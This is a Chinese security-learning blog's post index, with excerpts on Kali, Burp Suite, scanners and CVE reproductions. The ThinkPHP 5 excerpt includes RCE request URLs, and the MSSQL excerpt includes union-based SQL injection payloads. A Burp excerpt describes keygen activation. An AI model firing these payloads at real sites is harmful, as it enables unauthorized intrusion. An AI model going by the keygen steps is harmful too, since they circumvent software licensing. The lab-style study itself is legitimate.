- 博客(24)
- 资源 (4)
- 收藏
- 关注
RSS订阅
原创 kali burpsuit抓取不了https的包
可能有很多老铁都会遇到这问题,废话少说,分享一波(格式啥的就不用在意啦) 先设置一波代理 抓https的包,发现抓取不了 导入证书,注意右边,别看走眼了(方法不唯一,也可以抓包获取证书,麻烦) 保存(默认保存再 下载 这个文件夹 你也可以另行更改) 在浏览器搜索->证书<-二字 导入刚才的证书 别多想了 点就完事了 %@##%%¥##这货太菜了 竟然失败了?!!!!!!...
2020-03-29 11:24:57
2974
3
原创 kali命令行自动获取ip
简述 我的是最新版kali2020.1a,里面有两块网卡lo(回环)和eth0,但eth0没有开启dhcp,每次切换网络的时候都有点不方便(net的除外) 配置 在这里我们可以看到虚拟机已设置桥接,但物理机与虚拟机网段不一样 进入 /etc/network文件查看并编辑interface文件 原来只有auto lo 和iface lo inet loopback这两行(lo为回环接口) 这里我要...
2020-03-29 09:46:53
7811
原创 怎么学习安全?
不止web,我对攻防都很感兴趣,但是连web都没学明白,就不要想着其他的了 我曾经问过一位师傅 我该怎么学习渗透 师傅回答很精辟: 渗透的时候,你觉得自己是因为哪方面的不足而导致你没达到预期的目标? 思路?工具?亦或者其他? 遇到不懂的问题该怎么办? 百度能解决的问题都不是问题 百度没有搜出来? 先排一下错,最根本的问题是什么 然后一步步查找资料 实在没辙了,再去请教别人 最后想想自己为什么没有想到 别老想着问别人 不懂就要问 那是小孩子才干的事情 ...
2021-06-11 18:16:06
251
原创 数据库导入大量数据
突然想学一下其他的,巴拉网盘的时候发现这个,上网找一下视频学习 下面为笔记,侵权请联系我进行删除 用笔记本打不开 excel可以打开很大数据的文件,但也有个限度 大约百万行(假数据,练习用,现已销毁) 发现qq与电话中间的分隔符为双引号 复制到笔记本发现其还有一个类似tab建的空白部分(蓝色那里) 利用python替换分割符 记得用with open打开文件别用read()或readline()之类的 因为with打开在内存中是读取一行删除一行,而后面的则是先加载整个文档–》数据量不大可以,如果数
2021-03-17 15:31:10
425
原创 awvs13安装
安装 点击安装 邮箱随便 密码 记住邮箱和密码 分析下面两张图的路径你就知道怎么操作了 网盘 链接:https://pan.baidu.com/s/1nluafI6uMhY_S8aohvKDvQ 提取码:y5qy
2020-11-27 12:25:45
800
9
原创 Centos7命令行修改字体大小及颜色
centos7修改字体大小及颜色 进入字体文件所在目录 cd /lib/kbd/consolefonts 查看可设置的字体 ls 设置想要的字体 setfont 字体名字 如: setfont latarcyrheb-sun32.psfu.gz #后面的数字越大,字体越大 修改字体颜色为绿色 setterm -forceground green 设置开机自启 echo 'setfont latarcyrheb-sun32.psfu.gz’ >> /etc/bashrc echo 'sett
2020-08-07 14:26:24
10233
4
原创 wpscan获取免费的API及用法
wpscan 扫描的时候提示没有api 所以扫不到有漏洞的插件 [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up ...
2020-07-10 14:39:08
9277
5
原创 cve-2020-1938 复现(切换python版本)
0x00安装apache-tomcat环境受影响版本: Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0.31 这里用的版本为 apache-tomcat-8.5.32 0x01配置环境 0x02验证 注意 python版本为2 命令 update-alternatives --config python 参考 https://github.com/Y
2020-05-28 21:37:24
636
原创 docker删除镜像
docker rm container_id 删除imge 提示要删除 container 打开container 查看container id 先停止其关联的所有container id 然后再删除container id 最后删除image id
2020-05-27 21:59:13
293
原创 kali burpsuit打不开
嫌弃kali指代的bp版本 下载了个新的(还是社区版,怀疑当时脑子有病) 之前配置好了 安装docker时 apt-get update 把我bp的目录指向改了(情况为点击图标或命令打开都没反应) 做如下操作即可
2020-05-27 21:07:59
3366
原创 Apache Solr CVE-2019-0193 环境搭建漏洞复现
docker pull scxiaotan2/apache-solr:cve-2019-0193 # 拉取镜像 docker run -it scxiaotan2/apache-solr:cve-2019-0193 /bin/bash #启动shell ./start.sh #启动根目录下的服务 netstat -tlnp #可以看到1983端口启用了
2020-05-27 20:41:28
469
原创 windows环境burpsuit安装教程
jdk安装: jdk安装教程 打开keygen 点击run xingkongxiadeqingtong是随便填的 把上面的内容复制到下面 点击Manual activation 复制的内容如箭头所示 弄完上面的操作后,全部关掉,再运行keygen,看看还要不要激活 (我这里是不用的,代表着成功) ...
2020-05-16 13:18:26
1575
原创 window配置java环境
点击安装 路径默认就行 这里会让你再选一个目录(别搞什么中文目录) 配置java_home(变量名随便取,规范点就是这个,其实我本不用配这个,为了方便开发的大佬) ;%java_home%\bin ps:’;'为英文的符号 %%取变量的值 ???? ...
2020-05-15 21:31:16
504
原创 墨者-mssql手工注入
发现链接 and 1=1正常 and 1=2错误 ‘ 错误 存在注入 order by 3错误 4正常 5错误 and (select count() from sysobjects) >0 MSSQL and (select count() from msysobjects) >0 ACCESS id =-2 union all select null,null,null,null 4个null 发现2成功回显 看数据库有啥 个人猜测为mozhe_d
2020-05-09 00:49:53
371
原创 自学网络安全-笔记1
一、常识 1、vm 分为寄生架构和原生架构 2、软件啥的 默认安装就行了 占不了多少内存的(配置文件放C盘 数据文件(如pycharm的项目文件)放在D盘) 3、win10关闭自动更新 1)ctrl+r 输入 services.msc 找到Windows update 禁用 点击 恢复 第一失败–>无操作 2)CTRL+r 输入 gpedit.msc 打开组策略 -->计算机...
2020-05-07 14:19:29
316
原创 sql注入之布尔盲注-脚本
sql注入之布尔盲注-脚本 先给大家普及一下 在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。 information_schema数据库常用表说明: SCHEMATA表:提供了当前mysql实例中所有数据库的信息。如show databases就是在这查询的 TABLES表:提供了关于数据...
2020-05-05 20:27:17
3188
1
原创 如何利用ThinkPHPv5的漏洞来getshell
影响范围 ThinkPHP 5.0系列 < 5.0.24 过程 查看信息 http://ip(url)/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=id(1,2,3之类的) http://ip(url)/index.php?s=index/think\app/invokefuncti...
2020-03-26 17:24:23
4308
jdk-14.0.2_windows-x64_bin
2020-12-04
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人